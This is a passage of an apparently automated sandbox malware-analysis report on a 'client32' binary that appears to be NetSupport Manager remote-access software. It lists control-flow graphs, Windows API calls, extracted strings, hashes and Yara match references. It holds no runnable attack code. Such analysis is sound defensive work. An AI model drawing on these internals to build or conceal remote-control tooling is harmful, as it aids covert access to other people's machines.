                                                                                                                                                                                                    control_flow_graph 1867 685998d0-68599932 1868 68599934-68599955 call 685930a0 call 685b28e1 1867->1868 1869 68599956-6859995e 1867->1869 1871 68599ac5-68599acc 1869->1871 1872 68599964-68599979 call 685b28f0 1869->1872 1873 68599b19-68599b1d 1871->1873 1874 68599ace-68599adb 1871->1874 1872->1871 1888 6859997f-68599994 call 685b4330 1872->1888 1879 68599b4b-68599b70 GetTickCount InterlockedExchange EnterCriticalSection 1873->1879 1880 68599b1f-68599b26 1873->1880 1877 68599af8-68599b07 wsprintfA 1874->1877 1878 68599add-68599af6 wsprintfA 1874->1878 1883 68599b0a-68599b16 call 685952b0 1877->1883 1878->1883 1886 68599b9c-68599ba1 1879->1886 1887 68599b72-68599b9b LeaveCriticalSection call 685930a0 call 685b28e1 1879->1887 1880->1879 1884 68599b28-68599b41 call 685977b0 1880->1884 1883->1873 1884->1879 1908 68599b43-68599b45 1884->1908 1890 68599bfb-68599c05 1886->1890 1891 68599ba3-68599bd0 call 68594dd0 1886->1891 1888->1871 1903 6859999a-685999af call 685b28f0 1888->1903 1899 68599c3b-68599c47 1890->1899 1900 68599c07-68599c17 1890->1900 1913 68599d4b-68599d6c LeaveCriticalSection call 685a77e0 1891->1913 1914 68599bd6-68599bf6 WSAGetLastError call 685930a0 1891->1914 1904 68599c50-68599c5a 1899->1904 1906 68599c19-68599c1d 1900->1906 1907 68599c20-68599c22 1900->1907 1903->1871 1925 685999b5-685999f1 1903->1925 1911 68599d2e-68599d3b call 685930a0 1904->1911 1912 68599c60-68599c65 1904->1912 1906->1907 1915 68599c1f 1906->1915 1907->1899 1916 68599c24-68599c36 call 685946c0 1907->1916 1908->1879 1930 68599d45 1911->1930 1920 68599c71-68599c9a send 1912->1920 1921 68599c67-68599c6b 1912->1921 1934 68599d78-68599d8a call 685b28e1 1913->1934 1935 68599d6e-68599d72 InterlockedIncrement 1913->1935 1914->1913 1915->1907 1916->1899 1926 68599c9c-68599c9f 1920->1926 1927 68599cf1-68599d0f call 685930a0 1920->1927 1921->1911 1921->1920 1931 685999f7-685999ff 1925->1931 1932 68599cbe-68599cce WSAGetLastError 1926->1932 1933 68599ca1-68599cac 1926->1933 1927->1930 1930->1913 1937 68599aa3-68599ac2 call 685930a0 1931->1937 1938 68599a05-68599a08 1931->1938 1940 68599d11-68599d2c call 685930a0 1932->1940 1941 68599cd0-68599ce9 timeGetTime Sleep 1932->1941 1933->1930 1939 68599cb2-68599cbc 1933->1939 1935->1934 1937->1871 1945 68599a0a-68599a0c 1938->1945 1946 68599a0e 1938->1946 1939->1941 1940->1930 1941->1904 1947 68599cef 1941->1947 1951 68599a14-68599a1d 1945->1951 1946->1951 1947->1930 1953 68599a8d-68599a8e 1951->1953 1954 68599a1f-68599a22 1951->1954 1953->1937 1955 68599a24 1954->1955 1956 68599a26-68599a35 1954->1956 1955->1956 1957 68599a90-68599a93 1956->1957 1958 68599a37-68599a3a 1956->1958 1959 68599a9d 1957->1959 1960 68599a3c 1958->1960 1961 68599a3e-68599a4d 1958->1961 1959->1937 1960->1961 1962 68599a4f-68599a52 1961->1962 1963 68599a95-68599a98 1961->1963 1964 68599a54 1962->1964 1965 68599a56-68599a65 1962->1965 1963->1959 1964->1965 1966 68599a9a 1965->1966 1967 68599a67-68599a6a 1965->1967 1966->1959 1968 68599a6c 1967->1968 1969 68599a6e-68599a85 1967->1969 1968->1969 1969->1931 1970 68599a8b 1969->1970 1970->1937
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                                                                    • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                                                                    • API String ID: 909875538-2848211065
                                                                                                                                                                                                    • Opcode ID: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
                                                                                                                                                                                                    • Instruction ID: 2ef811b70579311959dfd9ad39713bda9f9f37d801767944afe4c474126e2712
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCD1DD75A042559FDF20CF68CC84BEEBBB5AF4A314F8440D9D81D9B242D7319A84CF92
                                                                                                                                                                                                    Function 11028290 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1971 11028290-110282ad 1972 110282b3-110282e2 1971->1972 1973 11028978-1102897f 1971->1973 1974 11028370-110283b8 GetModuleFileNameA call 1115f9c0 call 1116076b 1972->1974 1975 110282e8-110282ee 1972->1975 1976 11028991-11028995 1973->1976 1977 11028981-1102898a 1973->1977 1991 110283bd 1974->1991 1981 110282f0-110282f8 1975->1981 1978 11028997-110289a9 call 1115e4d1 1976->1978 1979 110289aa-110289be call 1115e4d1 1976->1979 1977->1976 1982 1102898c 1977->1982 1981->1981 1986 110282fa-11028300 1981->1986 1982->1976 1990 11028303-11028308 1986->1990 1990->1990 1992 1102830a-11028314 1990->1992 1995 110283c0-110283ca 1991->1995 1993 11028331-11028337 1992->1993 1994 11028316-1102831d 1992->1994 1997 11028338-1102833e 1993->1997 1996 11028320-11028326 1994->1996 1998 110283d0-110283d3 1995->1998 1999 1102896f-11028977 1995->1999 1996->1996 2000 11028328-1102832e 1996->2000 1997->1997 2001 11028340-1102836e call 1116076b 1997->2001 1998->1999 2002 110283d9-110283e7 call 11026500 1998->2002 1999->1973 2000->1993 2001->1995 2007 110288f5-1102890a call 11160535 2002->2007 2008 110283ed-11028400 call 1115f5b7 2002->2008 2007->1999 2015 11028910-1102896a 2007->2015 2013 11028402-11028405 2008->2013 2014 1102840b-11028433 call 11026370 call 11026500 2008->2014 2013->2007 2013->2014 2014->2007 2020 11028439-11028456 call 110265f0 call 11026500 2014->2020 2015->1999 2025 11028865-1102886c 2020->2025 2026 1102845c 2020->2026 2028 11028892-11028899 2025->2028 2029 1102886e-11028871 2025->2029 2027 11028460-11028480 call 11026370 2026->2027 2039 11028482-11028485 2027->2039 2040 110284b6-110284b9 2027->2040 2030 110288b1-110288b8 2028->2030 2031 1102889b-110288a1 2028->2031 2029->2028 2033 11028873-1102887a 2029->2033 2035 110288ba-110288c5 2030->2035 2036 110288c8-110288cf 2030->2036 2034 110288a7-110288af 2031->2034 2038 11028880-11028890 2033->2038 2034->2030 2034->2034 2035->2036 2041 110288d1-110288db 2036->2041 2042 110288de-110288e5 2036->2042 2038->2028 2038->2038 2043 11028487-1102848e 2039->2043 2044 1102849e-110284a1 2039->2044 2046 1102884e-1102885f call 11026500 2040->2046 2047 110284bf-110284d2 call 111608d0 2040->2047 2041->2042 2042->2007 2045 110288e7-110288f2 2042->2045 2048 11028494-1102849c 2043->2048 2044->2046 2049 110284a7-110284b1 2044->2049 2045->2007 2046->2025 2046->2027 2047->2046 2054 110284d8-110284f4 call 11160e4e 2047->2054 2048->2044 2048->2048 2049->2046 2057 110284f6-110284fc 2054->2057 2058 1102850f-11028525 call 11160e4e 2054->2058 2059 11028500-11028508 2057->2059 2063 11028527-1102852d 2058->2063 2064 1102853f-11028555 call 11160e4e 2058->2064 2059->2059 2061 1102850a 2059->2061 2061->2046 2065 11028530-11028538 2063->2065 2069 11028557-1102855d 2064->2069 2070 1102856f-11028585 call 11160e4e 2064->2070 2065->2065 2067 1102853a 2065->2067 2067->2046 2072 11028560-11028568 2069->2072 2075 11028587-1102858d 2070->2075 2076 1102859f-110285b5 call 11160e4e 2070->2076 2072->2072 2074 1102856a 2072->2074 2074->2046 2077 11028590-11028598 2075->2077 2081 110285b7-110285bd 2076->2081 2082 110285cf-110285e5 call 11160e4e 2076->2082 2077->2077 2079 1102859a 2077->2079 2079->2046 2083 110285c0-110285c8 2081->2083 2087 110285e7-110285ed 2082->2087 2088 110285ff-11028615 call 11160e4e 2082->2088 2083->2083 2085 110285ca 2083->2085 2085->2046 2090 110285f0-110285f8 2087->2090 2093 11028617-1102861d 2088->2093 2094 1102862f-11028645 call 11160e4e 2088->2094 2090->2090 2091 110285fa 2090->2091 2091->2046 2095 11028620-11028628 2093->2095 2099 11028647-1102864d 2094->2099 2100 1102865f-11028675 call 11160e4e 2094->2100 2095->2095 2097 1102862a 2095->2097 2097->2046 2101 11028650-11028658 2099->2101 2105 11028677-1102867d 2100->2105 2106 1102868f-110286a5 call 11160e4e 2100->2106 2101->2101 2103 1102865a 2101->2103 2103->2046 2107 11028680-11028688 2105->2107 2111 110286a7-110286ad 2106->2111 2112 110286bf-110286d5 call 11160e4e 2106->2112 2107->2107 2109 1102868a 2107->2109 2109->2046 2113 110286b0-110286b8 2111->2113 2117 110286d7-110286dd 2112->2117 2118 110286ef-11028705 call 11160e4e 2112->2118 2113->2113 2115 110286ba 2113->2115 2115->2046 2120 110286e0-110286e8 2117->2120 2123 11028726-1102873c call 11160e4e 2118->2123 2124 11028707-1102870d 2118->2124 2120->2120 2122 110286ea 2120->2122 2122->2046 2129 11028753-11028769 call 11160e4e 2123->2129 2130 1102873e 2123->2130 2125 11028717-1102871f 2124->2125 2125->2125 2127 11028721 2125->2127 2127->2046 2135 11028780-11028796 call 11160e4e 2129->2135 2136 1102876b 2129->2136 2131 11028744-1102874c 2130->2131 2131->2131 2133 1102874e 2131->2133 2133->2046 2141 110287b7-110287cd call 11160e4e 2135->2141 2142 11028798-1102879e 2135->2142 2138 11028771-11028779 2136->2138 2138->2138 2139 1102877b 2138->2139 2139->2046 2147 110287ef-11028805 call 11160e4e 2141->2147 2148 110287cf-110287df 2141->2148 2143 110287a8-110287b0 2142->2143 2143->2143 2145 110287b2 2143->2145 2145->2046 2153 11028807-1102880d 2147->2153 2154 1102881c-11028832 call 11160e4e 2147->2154 2149 110287e0-110287e8 2148->2149 2149->2149 2151 110287ea 2149->2151 2151->2046 2155 11028810-11028818 2153->2155 2154->2046 2159 11028834-1102883a 2154->2159 2155->2155 2157 1102881a 2155->2157 2157->2046 2160 11028844-1102884c 2159->2160 2160->2046 2160->2160
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AF1370,?,0000001A), ref: 1102837D
                                                                                                                                                                                                    • _strrchr.LIBCMT ref: 1102838C
                                                                                                                                                                                                      • Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                                                                    • API String ID: 1609618855-357498123
                                                                                                                                                                                                    • Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92
                                                                                                                                                                                                    Function 685A6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 2161 685a6ba0-685a6c14 call 685b4710 call 68595e90 GetTickCount call 685a9210 2168 685a6c1a-685a6c1c 2161->2168 2169 685a6fb9-685a6fc9 call 685b28e1 2161->2169 2171 685a6c26-685a6c33 GetTickCount 2168->2171 2173 685a6c42-685a6c49 2171->2173 2174 685a6c35-685a6c3d call 685a6940 2171->2174 2175 685a6c4b call 685997c0 2173->2175 2176 685a6c50-685a6c57 2173->2176 2174->2173 2175->2176 2179 685a6c59-685a6c61 Sleep 2176->2179 2180 685a6c66-685a6c6d 2176->2180 2181 685a6f97-685a6f9e 2179->2181 2182 685a6c6f-685a6c7c WaitForSingleObject 2180->2182 2183 685a6c82-685a6cc2 call 685b3c10 select 2180->2183 2184 685a6c20 2181->2184 2185 685a6fa4-685a6fb6 call 685b28e1 2181->2185 2182->2183 2183->2185 2190 685a6cc8-685a6ccb 2183->2190 2184->2171 2191 685a6ccd-685a6cdf Sleep 2190->2191 2192 685a6ce4-685a6ce6 2190->2192 2191->2181 2192->2171 2193 685a6cec-685a6cf9 GetTickCount 2192->2193 2194 685a6d00-685a6d1c 2193->2194 2195 685a6f89-685a6f91 2194->2195 2196 685a6d22 2194->2196 2195->2181 2195->2194 2197 685a6d28-685a6d2b 2196->2197 2198 685a6d3d-685a6d45 2197->2198 2199 685a6d2d-685a6d36 2197->2199 2198->2195 2201 685a6d4b-685a6d95 call 685b3753 call 68595c90 2198->2201 2199->2197 2200 685a6d38 2199->2200 2200->2195 2206 685a6d9b 2201->2206 2207 685a6f4f-685a6f7c GetTickCount InterlockedExchange call 685a77e0 2201->2207 2209 685a6dac-685a6ded call 68599310 2206->2209 2207->2181 2212 685a6f7e-685a6f83 2207->2212 2214 685a6f3a-685a6f46 call 685930a0 2209->2214 2215 685a6df3-685a6e58 GetTickCount InterlockedExchange call 685b3753 call 685b3c10 2209->2215 2212->2195 2221 685a6f47-685a6f4c call 6859a4e0 2214->2221 2224 685a6e5a-685a6e5b 2215->2224 2225 685a6e8b-685a6e99 call 685a28d0 2215->2225 2221->2207 2227 685a6e5d-685a6e74 call 68596f50 2224->2227 2228 685a6e76-685a6e89 call 685994e0 2224->2228 2232 685a6e9e-685a6ea4 2225->2232 2235 685a6ea7-685a6ebd call 685a77e0 2227->2235 2228->2232 2232->2235 2238 685a6ebf-685a6f1d InterlockedDecrement SetEvent call 685b31a0 call 68595c90 2235->2238 2239 685a6f25-685a6f38 call 685930a0 2235->2239 2246 685a6f23 2238->2246 2247 685a6da0-685a6da6 2238->2247 2239->2221 2246->2207 2247->2209
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6BD5
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6C26
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 685A6C5B
                                                                                                                                                                                                      • Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000300,?), ref: 685A6C7C
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 685A6C93
                                                                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 685A6CB4
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 685A6CD9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6CEC
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A6D76
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6DF3
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02D42F1A,00000000), ref: 685A6E01
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A6E33
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 685A6E47
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(02D42EC2), ref: 685A6EC3
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000304), ref: 685A6ECF
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 685A6EF4
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A6F4F
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02D42E62,-685DA188), ref: 685A6F60
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • httprecv, xrefs: 685A6BDD
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A6E62
                                                                                                                                                                                                    • ResumeTimeout, xrefs: 685A6BBA
                                                                                                                                                                                                    • ProcessMessage returned FALSE. Terminating connection, xrefs: 685A6F25
                                                                                                                                                                                                    • FALSE, xrefs: 685A6E67
                                                                                                                                                                                                    • ReadMessage returned FALSE. Terminating connection, xrefs: 685A6F3A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                                                                                    • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                                                                    • API String ID: 1449423504-919941520
                                                                                                                                                                                                    • Opcode ID: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
                                                                                                                                                                                                    • Instruction ID: 5768964ac529070e8d603857501e83de661ed71089ed95d69a90bef8bcf9960d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7B1A0B5D002549FDF20DB68CC84BEEB7B4EB49344F81409AEA59A7240E7B49EC4CF95
                                                                                                                                                                                                    Function 11085840 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 2248 11085840-1108585d call 11085830 2251 1108585f-1108586f call 1115e4d1 2248->2251 2252 11085870-11085880 call 11141240 2248->2252 2257 11085882-1108588a 2252->2257 2257->2257 2258 1108588c-11085892 2257->2258 2259 11085893-11085899 2258->2259 2259->2259 2260 1108589b-110858d2 LoadLibraryA 2259->2260 2261 11085939-1108594e GetProcAddress 2260->2261 2262 110858d4-110858db 2260->2262 2263 110859dc-110859ed call 1115e4d1 2261->2263 2264 11085954-11085963 GetProcAddress 2261->2264 2265 110858dd-1108592e GetModuleFileNameA call 11080be0 LoadLibraryA 2262->2265 2266 11085930-11085933 2262->2266 2264->2263 2267 11085965-11085974 GetProcAddress 2264->2267 2265->2266 2266->2261 2266->2263 2267->2263 2271 11085976-11085985 GetProcAddress 2267->2271 2271->2263 2273 11085987-11085996 GetProcAddress 2271->2273 2273->2263 2274 11085998-110859a7 GetProcAddress 2273->2274 2274->2263 2275 110859a9-110859b8 GetProcAddress 2274->2275 2275->2263 2276 110859ba-110859c9 GetProcAddress 2275->2276 2276->2263 2277 110859cb-110859da GetProcAddress 2276->2277 2277->2263 2278 110859ee-11085a03 call 1115e4d1 2277->2278
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                                                    • API String ID: 2201880244-3035937465
                                                                                                                                                                                                    • Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                                                                                    • Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51
                                                                                                                                                                                                    Function 11136060 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 348windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
